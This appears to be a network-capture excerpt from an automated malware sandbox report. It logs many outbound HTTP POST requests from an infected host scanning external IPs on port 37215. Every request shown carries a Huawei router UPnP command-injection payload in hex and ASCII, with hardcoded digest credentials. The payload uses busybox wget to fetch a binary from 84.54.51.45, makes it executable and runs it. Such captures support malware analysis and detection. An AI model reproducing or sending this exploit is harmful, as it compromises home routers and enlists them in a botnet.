                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1617192.168.2.155659441.117.185.537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109394073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1618192.168.2.153317641.149.122.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109407902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1619192.168.2.154204641.138.87.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.109411955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1620192.168.2.153547241.76.13.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.110084057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1621192.168.2.153588041.70.109.7937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.110805035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1622192.168.2.155173841.72.57.23537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.111598969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1623192.168.2.1560892156.104.76.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460680962 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1624192.168.2.1558534156.30.3.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460692883 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1625192.168.2.1550908156.111.119.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460721970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1626192.168.2.1535632156.52.221.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460747004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 